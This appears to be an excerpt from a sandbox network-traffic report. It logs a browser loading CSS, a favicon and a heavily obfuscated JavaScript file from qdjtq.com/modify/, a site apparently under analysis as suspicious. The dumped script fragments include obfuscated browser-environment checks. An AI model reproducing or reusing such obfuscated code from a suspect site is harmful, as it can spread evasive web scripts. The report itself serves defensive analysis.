            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: text/css,*/*;q=0.1
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: style
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:37 UTC350INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:37 GMT
            Content-Type: text/css; charset=utf-8
            Content-Length: 358609
            Connection: close
            Vary: Accept-Encoding
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:28 GMT
            ETag: W/"578d1-19024951360"
            2024-09-27 00:29:37 UTC16034INData Raw: 2e 77 70 54 6f 6f 6c 62 61 72 43 6f 6d 6d 6f 6e 49 6d 61 67 65 73 2d 41 64 64 54 6f 7b 77 69 64 74 68 3a 38 70 78 3b 68 65 69 67 68 74 3a 38 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 20 30 7d 2e 77 70 54 6f 6f 6c 62 61 72 43 6f 6d 6d 6f 6e 49 6d 61 67 65 73 2d 41 64 76 61 6e 63 65 64 4d 6f 64 65 48 6f 76 65 72 7b 77 69 64 74 68 3a 31 38 70 78 3b 68 65 69 67 68 74 3a 31 38 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 2d 31 38 70 78 7d 2e 77 70 54 6f 6f 6c 62 61 72 43 6f 6d 6d 6f 6e 49 6d 61 67 65 73 2d 41 64 76 61 6e 63 65 64 4d 6f 64 65 48 6f 76 65 72 2d 72 74 6c 7b 77 69 64 74 68 3a 31 38 70 78 3b 68 65 69 67 68 74 3a 31 38 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 30 2d
            Data Ascii: .wpToolbarCommonImages-AddTo{width:8px;height:8px;background-position:0 0}.wpToolbarCommonImages-AdvancedModeHover{width:18px;height:18px;background-position:0-18px}.wpToolbarCommonImages-AdvancedModeHover-rtl{width:18px;height:18px;background-position:0-
            2024-09-27 00:29:37 UTC16384INData Raw: 6d 4b 73 49 45 52 6a 31 66 2f 31 36 2b 54 6b 35 41 53 34 66 62 75 6c 70 61 55 46 57 46 6c 5a 58 56 31 64 42 64 78 75 4c 68 62 51 4e 45 33 54 39 42 56 6d 67 72 75 37 75 37 75 37 75 2f 7a 76 71 61 6e 70 36 61 6b 70 51 4b 65 72 72 61 32 74 42 58 37 2b 74 46 71 74 56 70 34 41 4b 53 4d 4a 52 33 70 4b 5a 48 31 43 58 4b 30 75 4c 71 5a 70 34 50 56 72 4c 75 38 67 73 4e 76 74 64 72 73 39 57 52 5a 70 32 41 7a 35 66 4c 39 2f 2b 33 79 41 77 54 41 36 61 6a 41 41 4b 79 76 4c 79 38 76 4c 51 48 6b 35 74 77 6c 53 4b 70 58 4b 2f 48 77 2b 59 59 71 45 32 2b 31 32 65 7a 7a 38 4d 74 66 61 65 76 66 75 6e 54 76 41 6d 7a 64 76 33 37 35 37 42 36 6a 56 61 72 56 61 7a 63 39 35 6a 55 61 6a 30 57 69 53 33 77 78 64 47 6f 67 51 6b 64 6a 63 33 4e 7a 63 33 47 54 5a 6f 61 47 68 6f 61 45 68
            Data Ascii: mKsIERj1f/16+Tk5AS4fbulpaUFWFlZXV1dBdxuLhbQNE3T9BVmgru7u7u7u/zvqanp6akpQKerra2tBX7+tFqtVp4AKSMJR3pKZH1CXK0uLqZp4PVrLu8gsNvtdrs9WRZp2Az5fL9/+3yAwTA6ajAAKyvLy8vLQHk5twlSKpXK/Hw+YYqE2+12ezz8MtfaevfunTvAmzdv3757B6jVarVazc95jUaj0WiS3wxdGogQkdjc3Nzc3GTZoaGhoaEh
            2024-09-27 00:29:37 UTC16384INData Raw: 41 55 43 6f 58 34 6b 6a 77 6e 39 51 4b 42 51 43 41 51 41 42 6f 61 47 68 73 62 47 77 47 37 33 57 35 6e 47 47 42 69 34 6c 39 50 61 47 70 71 61 6d 70 71 53 6e 34 41 6b 2f 59 41 4d 76 4c 45 46 62 6b 52 41 44 6f 36 4f 6a 6f 36 4f 6f 42 77 6d 43 4d 32 50 7a 38 2f 50 7a 2f 50 74 78 73 63 48 42 78 38 39 41 69 67 36 65 4a 69 74 66 71 69 6f 4b 65 6e 54 69 65 77 73 4c 43 77 73 4c 6a 49 50 78 38 65 48 68 34 65 48 67 62 55 36 70 4b 53 6b 68 4c 67 79 35 65 4e 6a 59 30 4e 59 47 46 68 63 58 46 78 6b 58 2f 76 39 6a 62 6e 63 58 71 39 58 71 2f 58 43 2f 65 45 68 44 30 67 4d 67 6a 4e 7a 73 37 4f 7a 73 34 43 74 62 55 31 4e 54 55 31 67 45 4b 68 55 43 67 55 52 43 43 41 31 43 54 6c 2b 2f 63 63 77 65 50 6a 34 2b 50 6a 59 37 34 6b 7a 79 50 72 45 7a 73 2b 6e 38 2f 6e 38 2f 47 78 5a
            Data Ascii: AUCoX4kjwn9QKBQCAQABoaGhsbGwG73W5nGGBi4l9PaGpqampqSn4Ak/YAMvLEFbkRADo6Ojo6OoBwmCM2Pz8/Pz/PtxscHBx89Aig6eJitfqioKenTiewsLCwsLjIPx8eHh4eHgbU6pKSkhLgy5eNjY0NYGFhcXFxkX/v9jbncXq9Xq/XC/eEhD0gMgjNzs7Ozs4CtbU1NTU1gEKhUCgURCCA1CTl+/ccwePj4+PjY74kzyPrEzs+n8/n8/GxZ
            2024-09-27 00:29:37 UTC16384INData Raw: 61 73 74 3e 73 70 61 6e 2c 2e 77 70 74 68 65 6d 65 42 61 6e 6e 65 72 20 75 6c 2e 77 70 74 68 65 6d 65 43 6f 6d 6d 6f 6e 41 63 74 69 6f 6e 73 20 6c 69 2e 77 70 74 68 65 6d 65 4c 61 73 74 20 61 2c 2e 77 70 74 68 65 6d 65 42 61 6e 6e 65 72 20 75 6c 2e 77 70 74 68 65 6d 65 43 6f 6d 6d 6f 6e 41 63 74 69 6f 6e 73 20 6c 69 2e 77 70 74 68 65 6d 65 4c 61 73 74 20 61 3a 61 63 74 69 76 65 7b 62 6f 72 64 65 72 3a 30 7d 2e 77 70 74 68 65 6d 65 41 63 74 69 6f 6e 44 69 73 61 62 6c 65 64 3a 68 6f 76 65 72 2c 2e 77 70 74 68 65 6d 65 41 63 74 69 6f 6e 44 69 73 61 62 6c 65 64 3a 66 6f 63 75 73 7b 63 75 72 73 6f 72 3a 6e 6f 74 2d 61 6c 6c 6f 77 65 64 7d 2e 77 70 74 68 65 6d 65 41 63 74 69 6f 6e 44 69 73 61 62 6c 65 64 20 2e 77 70 74 68 65 6d 65 55 6e 64 65 72 6c 69 6e 65 54
            Data Ascii: ast>span,.wpthemeBanner ul.wpthemeCommonActions li.wpthemeLast a,.wpthemeBanner ul.wpthemeCommonActions li.wpthemeLast a:active{border:0}.wpthemeActionDisabled:hover,.wpthemeActionDisabled:focus{cursor:not-allowed}.wpthemeActionDisabled .wpthemeUnderlineT
            2024-09-27 00:29:37 UTC16384INData Raw: 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 6d 69 64 64 6c 65 3b 77 68 69 74 65 2d 73 70 61 63 65 3a 6e 6f 77 72 61 70 7d 2e 77 70 73 54 61 73 6b 44 69 73 61 62 6c 65 64 49 63 6f 6e 54 65 78 74 42 61 63 6b 67 72 6f 75 6e 64 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 64 64 64 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 67 69 66 3b 62 61 73 65 36 34 2c 52 30 6c 47 4f 44 6c 68 41 51 41 55 41 4c 4d 41 41 41 41 41 41 50 2f 2f 2f 2f 44 77 38 4f 37 75 37 75 33 74 37 65 72 71 36 75 66 6e 35 2b 58 6c 35 65 4c 69 34 75 48 68 34 64 2f 66 33 2f 2f 2f 2f 77 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 43 48 35 42 41 45 41 41 41 73 41 4c 41 41 41 41 41 41 42 41
            Data Ascii: align:center;vertical-align:middle;white-space:nowrap}.wpsTaskDisabledIconTextBackground{background-color:#ddd;background-image:url(data:image/gif;base64,R0lGODlhAQAUALMAAAAAAP////Dw8O7u7u3t7erq6ufn5+Xl5eLi4uHh4d/f3////wAAAAAAAAAAAAAAACH5BAEAAAsALAAAAAABA
            2024-09-27 00:29:37 UTC16384INData Raw: 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 41 77 4d 44 2f 38 41 41 45 51 67 41 45 51 41 42 41 77 45 52 41 41 49 52 41 51 4d 52 41 66 2f 45 41 46 30 41 41 41 4d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 59 49 43 67 45 42 41 41 4d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 42 67 51 46 42 78 41 41 41 51 4d 46 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 46 54 46 76 43 42 41 70 49 44 45 51 41 43 41 67 4d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 46 41 46 68 55 51 49 56 2f 39 6f 41 44 41 4d 42 41 41 49 52 41 78 45 41 50 77 43 79 53 4b 4b 33 6c 56 6a 53 75 68 46 41 74 53 68 6c 6f 31 7a 62 54 55 46 75 7a 6b 53 72 61 68 38 56 4a 50 50 2f 32 51 3d 3d 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 72 65 70 65 61 74
            Data Ascii: DAwMDAwMDAwMDAwMD/8AAEQgAEQABAwERAAIRAQMRAf/EAF0AAAMAAAAAAAAAAAAAAAAAAAYICgEBAAMAAAAAAAAAAAAAAAAABgQFBxAAAQMFAAAAAAAAAAAAAAAAAAFTFvCBApIDEQACAgMAAAAAAAAAAAAAAAAAFAFhUQIV/9oADAMBAAIRAxEAPwCySKK3lVjSuhFAtShlo1zbTUFuzkSrah8VJPP/2Q==);background-repeat:repeat
            2024-09-27 00:29:37 UTC16384INData Raw: 38 66 48 78 38 66 48 78 38 66 48 78 38 66 48 78 38 66 48 78 38 66 48 78 38 66 48 78 38 66 48 78 38 66 48 78 38 66 48 78 38 66 48 78 38 66 48 78 38 66 2f 38 41 41 45 51 67 41 42 51 41 4b 41 77 45 52 41 41 49 52 41 51 4d 52 41 66 2f 45 41 46 59 41 41 51 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 49 48 41 51 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 45 41 41 42 41 67 59 44 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 52 41 42 49 42 51 51 4b 69 45 78 52 44 59 79 51 52 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 44 2f 32 67 41 4d 41 77 45 41 41 68 45 44 45 51 41 2f 41 4c 7a 58 69 66 48 61 47 78 79 35 41 35 30 79 55 42 38 50 58 61 67 2f 2f 39 6b 3d 29 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69
            Data Ascii: 8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8fHx8f/8AAEQgABQAKAwERAAIRAQMRAf/EAFYAAQEAAAAAAAAAAAAAAAAAAAIHAQEAAAAAAAAAAAAAAAAAAAAAEAABAgYDAAAAAAAAAAAAAAARABIBQQKiExRDYyQRAQAAAAAAAAAAAAAAAAAAAAD/2gAMAwEAAhEDEQA/ALzXifHaGxy5A50yUB8PXag//9k=);background-posi
            2024-09-27 00:29:37 UTC16384INData Raw: 3b 62 6f 72 64 65 72 2d 6c 65 66 74 3a 30 70 78 3b 77 69 64 74 68 3a 31 39 70 78 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 30 70 78 3b 68 65 69 67 68 74 3a 31 36 70 78 7d 2e 74 72 65 65 5f 6c 61 62 65 6c 48 69 67 68 6c 69 67 68 74 53 74 79 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 56 65 72 64 61 6e 61 2c 47 65 6e 65 76 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 7d 2e 74 72 65 65 5f 6c 61 62 65 6c 4d 6f 75 73 65 6f 76 65 72 53 74 79 6c 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 31 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f
            Data Ascii: ;border-left:0px;width:19px;border-bottom:0px;height:16px}.tree_labelHighlightStyle{font-size:11px;color:#000;font-family:Tahoma,Verdana,Geneva,Arial,Helvetica,sans-serif;font-weight:700}.tree_labelMouseoverStyle{font-size:11px;color:#000;font-family:Taho
            2024-09-27 00:29:37 UTC16384INData Raw: 43 6f 6e 74 72 6f 6c 42 6f 64 79 20 2e 6c 6f 74 75 73 57 65 6c 63 6f 6d 65 42 6f 78 7b 70 6f 73 69 74 69 6f 6e 3a 73 74 61 74 69 63 7d 2e 77 70 74 68 65 6d 65 50 6c 61 69 6e 20 2e 77 70 74 68 65 6d 65 43 6f 6e 74 72 6f 6c 48 65 61 64 65 72 20 2e 77 70 74 68 65 6d 65 4d 65 6e 75 46 6f 63 75 73 2c 2e 77 70 74 68 65 6d 65 5f 69 65 37 20 2e 77 70 74 68 65 6d 65 50 6c 61 69 6e 20 2e 77 70 74 68 65 6d 65 43 6f 6e 74 72 6f 6c 48 65 61 64 65 72 20 2e 77 70 74 68 65 6d 65 4d 65 6e 75 46 6f 63 75 73 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 77 70 74 68 65 6d 65 5f 69 65 37 20 2e 77 70 74 68 65 6d 65 4d 65 6e 75 44 72 6f 70 44 6f 77 6e 7b 6d 69 6e 2d 68 65 69 67 68 74 3a 30 7d 2e 77 70 74 68 65 6d 65 4d 65 6e 75 4c 65 66 74 7b 63 6f 6c 6f 72 3a 23 30 30 30 3b 66
            Data Ascii: ControlBody .lotusWelcomeBox{position:static}.wpthemePlain .wpthemeControlHeader .wpthemeMenuFocus,.wptheme_ie7 .wpthemePlain .wpthemeControlHeader .wpthemeMenuFocus{display:none}.wptheme_ie7 .wpthemeMenuDropDown{min-height:0}.wpthemeMenuLeft{color:#000;f
            2024-09-27 00:29:37 UTC16384INData Raw: 30 2c 30 29 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 74 72 61 6e 73 66 6f 72 6d 20 2e 33 35 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 38 35 2c 2e 30 35 2c 2e 31 38 2c 31 2e 33 35 29 7d 2e 74 6f 67 67 6c 65 2d 73 74 61 74 65 3a 63 68 65 63 6b 65 64 7e 2e 61 63 74 69 76 65 2d 62 67 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 2d 35 30 25 2c 30 2c 30 29 7d 2e 74 6f 67 67 6c 65 2d 73 74 61 74 65 3a 63 68 65 63 6b 65 64 7e 2e 74 6f 67 67 6c 65 2d 69 6e 6e 65 72 20 2e 69 6e 64 69 63 61 74 6f 72 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 32 35 25 2c 30 2c 30 29 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 35 38 33 31 38 7d 2e 64 69 73 61 62 6c 65 43 6c 69 63 6b 7b 6f 70 61 63 69 74 79 3a 2e 35 7d 2e 73 68 6f 77 2d
            Data Ascii: 0,0);transition:transform .35s cubic-bezier(.85,.05,.18,1.35)}.toggle-state:checked~.active-bg{transform:translate3d(-50%,0,0)}.toggle-state:checked~.toggle-inner .indicator{transform:translate3d(25%,0,0);background:#f58318}.disableClick{opacity:.5}.show-


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            13192.168.2.649731129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:36 UTC555OUTGET /modify/assets/ee4b0686tE5dP.css HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: text/css,*/*;q=0.1
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: no-cors
            Sec-Fetch-Dest: style
            Referer: https://qdjtq.com/modify/
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:37 UTC322INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:37 GMT
            Content-Type: text/css; charset=utf-8
            Content-Length: 474
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:28 GMT
            ETag: W/"1da-19024951360"
            2024-09-27 00:29:37 UTC474INData Raw: 68 31 2e 74 69 74 6c 65 5b 64 61 74 61 2d 76 2d 66 65 35 61 65 37 33 31 5d 7b 63 6f 6c 6f 72 3a 23 32 34 35 34 39 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 64 69 76 2e 63 6f 6e 74 65 6e 74 5b 64 61 74 61 2d 76 2d 66 65 35 61 65 37 33 31 5d 7b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 32 66 32 66 32 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 7d 75 6c 5b 64 61 74 61 2d 76 2d 66 65 35 61 65 37 33 31 5d 7b 6c 69 73 74 2d 73 74 79 6c 65 3a 64 69 73 63 20 6f 75 74 73 69 64 65 20 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 69 6e 69 74 69 61 6c 21 69 6d 70 6f 72 74 61 6e 74 7d 75 6c 5b 64 61 74 61 2d 76
            Data Ascii: h1.title[data-v-fe5ae731]{color:#24549d;font-size:2rem;text-align:center}div.content[data-v-fe5ae731]{padding:10px;background-color:#f2f2f2;border-radius:3px}ul[data-v-fe5ae731]{list-style:disc outside none!important;list-style:initial!important}ul[data-v


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            14192.168.2.649733129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:36 UTC528OUTGET /modify/assets/afbbad07ajMSD.js HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
            Origin: https://qdjtq.com
            sec-ch-ua-mobile: ?0
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            sec-ch-ua-platform: "Windows"
            Accept: */*
            Sec-Fetch-Site: same-origin
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: script
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:37 UTC362INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:37 GMT
            Content-Type: application/javascript; charset=utf-8
            Content-Length: 35011
            Connection: close
            Vary: Accept-Encoding
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:32 GMT
            ETag: W/"88c3-19024952300"
            2024-09-27 00:29:37 UTC16022INData Raw: 76 61 72 20 61 32 35 5f 30 78 31 36 35 64 32 64 3d 61 32 35 5f 30 78 63 62 39 36 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 35 35 62 66 35 2c 5f 30 78 35 64 66 30 64 39 29 7b 76 61 72 20 5f 30 78 35 37 65 39 36 66 3d 61 32 35 5f 30 78 63 62 39 36 2c 5f 30 78 33 39 65 36 37 61 3d 5f 30 78 31 35 35 62 66 35 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 31 35 32 63 31 30 3d 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 37 65 39 36 66 28 30 78 31 38 62 29 29 2f 30 78 31 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 35 37 65 39 36 66 28 30 78 31 64 39 29 29 2f 30 78 32 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 35 37 65 39 36 66 28 30 78 31 36 62 29 29 2f 30 78 33 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 35 37 65 39 36 66 28 30 78 32
            Data Ascii: var a25_0x165d2d=a25_0xcb96;(function(_0x155bf5,_0x5df0d9){var _0x57e96f=a25_0xcb96,_0x39e67a=_0x155bf5();while(!![]){try{var _0x152c10=-parseInt(_0x57e96f(0x18b))/0x1+-parseInt(_0x57e96f(0x1d9))/0x2*(parseInt(_0x57e96f(0x16b))/0x3)+parseInt(_0x57e96f(0x2
            2024-09-27 00:29:37 UTC16384INData Raw: 78 32 31 26 26 21 70 28 5b 27 63 68 72 6f 6d 69 75 6d 27 5d 2c 5f 30 78 33 35 64 33 66 64 29 3b 7d 7d 66 75 6e 63 74 69 6f 6e 20 46 28 5f 30 78 33 37 63 36 32 37 29 7b 76 61 72 20 5f 30 78 32 62 33 39 64 39 3d 61 32 35 5f 30 78 31 36 35 64 32 64 2c 5f 30 78 33 62 32 32 38 33 3d 5f 30 78 33 37 63 36 32 37 5b 5f 30 78 32 62 33 39 64 39 28 30 78 31 39 30 29 2b 27 6e 64 27 5d 3b 69 66 28 5f 30 78 33 62 32 32 38 33 5b 5f 30 78 32 62 33 39 64 39 28 30 78 31 62 34 29 5d 3d 3d 3d 2d 30 78 32 29 72 65 74 75 72 6e 20 75 5b 5f 30 78 32 62 33 39 64 39 28 30 78 32 32 38 29 5d 3b 7d 66 75 6e 63 74 69 6f 6e 20 47 28 5f 30 78 32 34 34 61 36 61 29 7b 76 61 72 20 5f 30 78 33 33 30 64 34 32 3d 61 32 35 5f 30 78 31 36 35 64 32 64 2c 5f 30 78 31 65 36 39 39 32 3d 5f 30 78 32
            Data Ascii: x21&&!p(['chromium'],_0x35d3fd);}}function F(_0x37c627){var _0x2b39d9=a25_0x165d2d,_0x3b2283=_0x37c627[_0x2b39d9(0x190)+'nd'];if(_0x3b2283[_0x2b39d9(0x1b4)]===-0x2)return u[_0x2b39d9(0x228)];}function G(_0x244a6a){var _0x330d42=a25_0x165d2d,_0x1e6992=_0x2
            2024-09-27 00:29:37 UTC2605INData Raw: 5f 30 78 34 33 62 39 63 33 20 69 6e 73 74 61 6e 63 65 6f 66 20 63 3f 5f 30 78 35 64 38 38 30 34 5b 5f 30 78 33 37 61 63 33 64 5d 3d 7b 27 73 74 61 74 65 27 3a 5f 30 78 34 33 62 39 63 33 5b 5f 30 78 35 65 63 66 66 66 28 30 78 31 62 34 29 5d 2c 27 65 72 72 6f 72 27 3a 27 27 5b 5f 30 78 35 65 63 66 66 66 28 30 78 32 30 34 29 5d 28 5f 30 78 34 33 62 39 63 33 5b 27 6e 61 6d 65 27 5d 2c 27 3a 5c 78 32 30 27 29 5b 5f 30 78 35 65 63 66 66 66 28 30 78 32 30 34 29 5d 28 5f 30 78 34 33 62 39 63 33 5b 27 6d 65 73 73 61 67 65 27 5d 29 7d 3a 5f 30 78 35 64 38 38 30 34 5b 5f 30 78 33 37 61 63 33 64 5d 3d 7b 27 73 74 61 74 65 27 3a 2d 30 78 33 2c 27 65 72 72 6f 72 27 3a 5f 30 78 34 33 62 39 63 33 20 69 6e 73 74 61 6e 63 65 6f 66 20 45 72 72 6f 72 3f 27 27 5b 27 63 6f 6e
            Data Ascii: _0x43b9c3 instanceof c?_0x5d8804[_0x37ac3d]={'state':_0x43b9c3[_0x5ecfff(0x1b4)],'error':''[_0x5ecfff(0x204)](_0x43b9c3['name'],':\x20')[_0x5ecfff(0x204)](_0x43b9c3['message'])}:_0x5d8804[_0x37ac3d]={'state':-0x3,'error':_0x43b9c3 instanceof Error?''['con


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            15192.168.2.649737129.226.167.1394436228C:\Program Files\Google\Chrome\Application\chrome.exe
            TimestampBytes transferredDirectionData
            2024-09-27 00:29:36 UTC344OUTGET /favicon.ico HTTP/1.1
            Host: qdjtq.com
            Connection: keep-alive
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
            Accept: */*
            Sec-Fetch-Site: none
            Sec-Fetch-Mode: cors
            Sec-Fetch-Dest: empty
            Accept-Encoding: gzip, deflate, br
            Accept-Language: en-US,en;q=0.9
            2024-09-27 00:29:37 UTC326INHTTP/1.1 200 OK
            Server: nginx/1.24.0
            Date: Fri, 27 Sep 2024 00:29:37 GMT
            Content-Type: image/vnd.microsoft.icon
            Content-Length: 38078
            Connection: close
            Access-Control-Allow-Origin: *
            Accept-Ranges: bytes
            Cache-Control: public, max-age=86400
            Last-Modified: Mon, 17 Jun 2024 05:04:20 GMT
            ETag: W/"94be-1902494f420"
            2024-09-27 00:29:37 UTC16058INData Raw: 00 00 01 00 01 00 60 60 00 00 01 00 20 00 a8 94 00 00 16 00 00 00 28 00 00 00 60 00 00 00 c0 00 00 00 01 00 20 00 00 00 00 00 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
            Data Ascii: `` (`
            2024-09-27 00:29:37 UTC16384INData Raw: 57 ab 25 ff 57 ab 25 ff 57 ac 25 ff 57 ac 25 ff 57 ac 25 ff 57 ac 25 ff 58 ac 25 ff 50 a9 1a ff a0 c3 8b ff db d6 de ff d1 d1 d1 ff d0 d0 d0 ff ce ce ce ff cc cc cd ff c7 c7 c8 ff c6 c9 c4 ff f1 f3 f0 ff ff ff ff ff d8 ec cc ff 55 ab 22 ff 57 ac 25 ff 58 ac 26 ff 58 ac 26 ff 58 ac 26 ff 58 ac 27 ff 58 ac 27 ff 58 ac 27 ff 58 ac 27 ff 58 ac 27 ff 4f a7 1a ff 9d ce 80 ff ff ff ff ff bd bd bd 87 ff ff ff ff f9 fc f7 ff 6f b7 44 ff 52 a9 1f ff 57 ab 25 ff 57 ab 25 ff 57 ab 25 ff 57 ab 25 ff 57 ab 25 ff 57 ab 25 ff 57 ab 25 ff 57 ab 25 ff 57 ab 25 ff 58 ab 25 ff 58 ab 25 ff 58 ab 25 ff 58 ab 26 ff 57 ab 24 ff 51 a8 1d ff 4e a7 19 ff 52 a9 1e ff 53 a9 20 ff 53 a9 20 ff 53 a9 20 ff 53 a9 20 ff 53 a9 20 ff 53 a9 20 ff 53 a9 20 ff 53 a9 20 ff 53 a9 20 ff 53 a9 20
            Data Ascii: W%W%W%W%W%W%X%PU"W%X&X&X&X'X'X'X'X'OoDRW%W%W%W%W%W%W%W%W%X%X%X%X&W$QNRS S S S S S S S S S
